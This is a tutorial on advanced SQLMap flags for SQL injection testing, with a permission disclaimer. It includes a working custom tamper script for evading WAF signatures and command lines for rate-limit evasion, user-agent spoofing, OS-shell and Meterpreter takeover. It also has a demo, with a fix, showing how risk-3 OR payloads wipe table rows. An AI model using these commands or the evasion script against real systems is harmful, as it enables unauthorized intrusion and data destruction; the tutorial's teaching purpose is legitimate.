Mastering SQLMap: Advanced Commands for Ethical Hacking

ExploitHeaven
2 min read · Apr 12, 2023


SQLMap is an open-source penetration testing tool that automates the detection and exploitation of SQL injection flaws. It is a standard part of the toolkit of penetration testers and application security engineers. In this article we look at a set of less commonly used SQLMap options that control how the tool behaves on the wire (pacing, retries, evasion), how aggressively it tests, and what it does once an injection is confirmed.

Before we begin, it’s crucial to note that this article is for educational purposes only. Make sure you have explicit permission from the website owners before running any penetration tests.

Getting Started with SQLMap
First, ensure you have SQLMap installed on your system. If you haven’t, you can download it from the official GitHub repository and follow the installation instructions.

With SQLMap installed, let’s dive into the advanced commands:

--batch: Runs SQLMap non-interactively, answering every prompt with its default choice. This is what you want in scripts and pipelines where nobody is at the keyboard. Run the same scan interactively once first, because the defaults (for example whether to follow redirects or to skip payloads for other database engines) are not always the choices you would make by hand.

```
sqlmap -u "http://example.com/page.php?id=1" --batch
```

--delay: Waits the given number of seconds between consecutive HTTP requests. This lowers the load on the target and keeps the request rate under the thresholds that rate-based WAF rules and intrusion detection systems key on. It also makes a full scan proportionally slower, since SQLMap can issue thousands of requests.

```
sqlmap -u "http://example.com/page.php?id=1" --delay 2
```

--timeout: Sets how many seconds SQLMap waits for a response before treating a request as failed (the default is 30). Lowering it keeps a scan moving against a slow or flaky target; raising it is sometimes needed when time-based payloads or heavy queries legitimately take long.

```
sqlmap -u "http://example.com/page.php?id=1" --timeout 10
```

--retries: Sets how many times SQLMap retries a request that failed with a connection error or timeout (the default is 3). Combine it with --delay and --timeout when the target drops connections under load.

```
sqlmap -u "http://example.com/page.php?id=1" --retries 3
```

--tamper: Tamper scripts are small Python modules from SQLMap's tamper/ directory that rewrite each payload before it is sent, typically to slip past a web application firewall or an input filter. Several can be chained by separating their names with commas; SQLMap applies them in their declared priority order. In the example, between replaces > and = comparisons with BETWEEN expressions so the payload contains neither character, and randomcase randomizes the letter case of SQL keywords to defeat case-sensitive signatures. Use --list-tampers to see every script that ships with SQLMap.

```
sqlmap -u "http://example.com/page.php?id=1" --tamper="between,randomcase"
```
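To show what a tamper script actually is, here is an added example of a custom one. It is not one of SQLMap's shipped scripts and is not from the original article: it reimplements, in simplified form, what between.py and randomcase.py do, so the two transformations can be seen applied in sequence. The file name tamper/between_randomcase.py and the short keyword list are assumptions; SQLMap's own scripts handle more cases than this one.

```python
"""Added example: a custom sqlmap tamper script (hypothetical file name
tamper/between_randomcase.py). It is not one of sqlmap's shipped scripts;
it reimplements, in simplified form, what between.py and randomcase.py do,
so the two transformations can be seen applied in sequence."""
import random
import re

try:
    # Present when sqlmap loads the script from its tamper/ directory.
    from lib.core.enums import PRIORITY
except ImportError:
    # Stand-alone fallback so the functions can be exercised outside sqlmap.
    class PRIORITY:
        NORMAL = 0

__priority__ = PRIORITY.NORMAL

# Keyword list is an assumption for this example; sqlmap's randomcase.py
# uses its own, much longer, keyword table.
KEYWORDS = re.compile(
    r"\b(AND|OR|NOT|SELECT|UNION|ALL|FROM|WHERE|BETWEEN|NULL|ORDER|BY|LIKE)\b",
    re.IGNORECASE,
)


def dependencies():
    """sqlmap calls this once at load time; nothing extra is required."""
    pass


def rewrite_comparisons(payload):
    """Replace '>' and '=' comparisons with BETWEEN so a filter that blocks
    those characters sees neither.

    For non-negative operands:  A > B  <=>  A NOT BETWEEN 0 AND B
                                A = B  <=>  A BETWEEN B AND B
    Compound operators (>=, <>, !=) are left untouched because the
    regexes require a word character directly beside the operator.
    """
    payload = re.sub(r"(\w+)\s*>\s*(\w+)", r"\1 NOT BETWEEN 0 AND \2", payload)
    payload = re.sub(r"(\w+)\s*=\s*(\w+)", r"\1 BETWEEN \2 AND \2", payload)
    return payload


def randomize_keyword_case(payload, rng=random):
    """Flip each letter of every SQL keyword to upper or lower case at
    random, defeating case-sensitive keyword signatures."""
    def flip(match):
        return "".join(rng.choice((ch.upper(), ch.lower())) for ch in match.group(0))
    return KEYWORDS.sub(flip, payload)


def tamper(payload, **kwargs):
    """Entry point sqlmap calls for every payload. An optional 'rng' kwarg
    (never passed by sqlmap itself) makes the output deterministic for tests."""
    if not payload:
        return payload
    rng = kwargs.get("rng", random)
    return randomize_keyword_case(rewrite_comparisons(payload), rng)


if __name__ == "__main__":
    # Constructed sample payload of the kind sqlmap's boolean-blind tests send.
    print(tamper("1 AND 2>1"))
```

Dropping the file into SQLMap's tamper/ directory and passing --tamper=between_randomcase makes SQLMap call tamper() on every payload it generates; the module-level __priority__ is what decides the order when several scripts are chained.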

--os-shell: Once an injection is confirmed, asks SQLMap to give you an interactive command prompt on the database server's operating system. This only works when the injection offers a route to command execution: stacked queries with a privileged database account (for example xp_cmdshell on Microsoft SQL Server), or enough file-write privilege to drop a web shell (for example the MySQL FILE privilege writing into a web-served directory, in which case SQLMap prompts you for the web root). On a locked-down account it will simply fail.

```
sqlmap -u "http://example.com/page.php?id=1" --os-shell
```

--os-pwn: Goes one step further than --os-shell and uses Metasploit to deliver a payload and open a Meterpreter (or VNC) session on the database server. It has the same prerequisites as --os-shell, plus a local Metasploit installation; if SQLMap cannot find it, point to it with --msf-path.

```
sqlmap -u "http://example.com/page.php?id=1" --os-pwn
```

--risk: Sets how dangerous the test payloads may be, from 1 (default) to 3. Risk 2 adds heavy time-based queries; risk 3 adds OR-based boolean tests. Those OR payloads are the problem: if the injectable parameter sits inside an UPDATE or DELETE statement, a condition that is true for every row modifies or removes every row. Stay at the default unless the engagement scope explicitly covers that kind of side effect.

```
sqlmap -u "http://example.com/page.php?id=1" --risk=3
```
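The following added example (not from the article and not SQLMap code) makes the risk-3 warning concrete. An in-memory SQLite database stands in for the target, vulnerable_deactivate is a hypothetical endpoint that concatenates an id into an UPDATE, and the payload strings are constructed to mirror the shape of SQLMap's AND-based (risk 1) and OR-based (risk 3) boolean tests; SQLMap's real payloads use random numbers rather than 1=1 or 2>1.

```python
"""Added example (not from the article or from sqlmap): why --risk=3 can
change data. The table, the endpoint and the payloads are constructed for
illustration; an in-memory SQLite database stands in for the target."""
import sqlite3


def build_db():
    """Constructed sample data: three active users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, active INTEGER)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice@example.com", 1), (2, "bob@example.com", 1), (3, "carol@example.com", 1)],
    )
    conn.commit()
    return conn


def vulnerable_deactivate(conn, user_id):
    """Hypothetical endpoint with the injection flaw: the id is concatenated
    into an UPDATE instead of being bound as a parameter."""
    sql = "UPDATE users SET active = 0 WHERE id = %s" % user_id
    cur = conn.execute(sql)
    conn.commit()
    return cur.rowcount


def safe_deactivate(conn, user_id):
    """The fix: a bound parameter, so the whole payload is compared as one
    literal value and never becomes part of the WHERE clause."""
    cur = conn.execute("UPDATE users SET active = 0 WHERE id = ?", (user_id,))
    conn.commit()
    return cur.rowcount


def rows_changed_by(payload):
    """Run one injected payload against a fresh database and report how many
    rows the vulnerable UPDATE touched."""
    conn = build_db()
    try:
        return vulnerable_deactivate(conn, payload)
    finally:
        conn.close()


def rows_changed_safely(payload):
    """Same payload against the parameterized version of the endpoint."""
    conn = build_db()
    try:
        return safe_deactivate(conn, payload)
    finally:
        conn.close()


if __name__ == "__main__":
    # AND-based boolean tests (risk 1) only narrow the WHERE clause ...
    print(rows_changed_by("1 AND 1=1"), rows_changed_by("1 AND 1=2"))  # 1 0
    # ... but the OR-based test added at risk 3 makes it true for every row.
    print(rows_changed_by("1 OR 2>1"))  # 3
    # With a bound parameter the same payload changes nothing.
    print(rows_changed_safely("1 OR 2>1"))  # 0
```

The AND-based tests can only make the WHERE clause narrower, so the worst case is that the single targeted row is touched; the OR-based test widens it to the whole table, which is exactly the data-damage scenario the risk setting exists to gate.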

--level: Sets how many tests SQLMap performs, from 1 (default) to 5. Higher levels do not make individual payloads more dangerous (that is --risk); they widen the search. Level 1 tests GET and POST parameters, level 2 adds Cookie values, level 3 adds the User-Agent and Referer headers, and levels 4 and 5 add more payload and boundary combinations. Expect the request count to grow sharply at level 5.

```
sqlmap -u "http://example.com/page.php?id=1" --level=5
```

--technique: Restricts SQLMap to specific injection techniques. The letters are B (boolean-based blind), E (error-based), U (UNION query), S (stacked queries), T (time-based blind) and Q (inline queries); by default all are tried. Combine letters to allow several, for example --technique=BEU. Note that features such as --os-shell depend on stacked queries or file writes, so excluding S can rule them out.

```
sqlmap -u "http://example.com/page.php?id=1" --technique=U
```

--dbms: Tells SQLMap which database engine is behind the application so it can skip fingerprinting and the payloads meant for other engines. Use it when you already know the backend; a wrong value makes SQLMap miss the injection.

```
sqlmap -u "http://example.com/page.php?id=1" --dbms=mysql
```

--user-agent: Replaces SQLMap's default User-Agent header, which identifies the tool by name and is trivially blocked. Set a browser-like value, or use --random-agent to have SQLMap pick one from its built-in list.

```
sqlmap -u "http://example.com/page.php?id=1" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299"
```

--threads: Runs up to the given number of concurrent HTTP requests (SQLMap caps this at 10). It speeds up boolean-based blind extraction considerably, but SQLMap falls back to a single thread for time-based blind retrieval because parallel requests make the timing measurements unreliable. More threads also means more load on the target, which works against --delay.

```
sqlmap -u "http://example.com/page.php?id=1" --threads 10
```

--proxy: Sends all traffic through an HTTP or SOCKS proxy. The usual reasons are to inspect and log every request in an intercepting proxy such as Burp Suite (listening on 127.0.0.1:8080 by default), or to source the scan from an address the target permits. Use --proxy-cred for proxies that require authentication.

```
sqlmap -u "http://example.com/page.php?id=1" --proxy="http://127.0.0.1:8080"
```
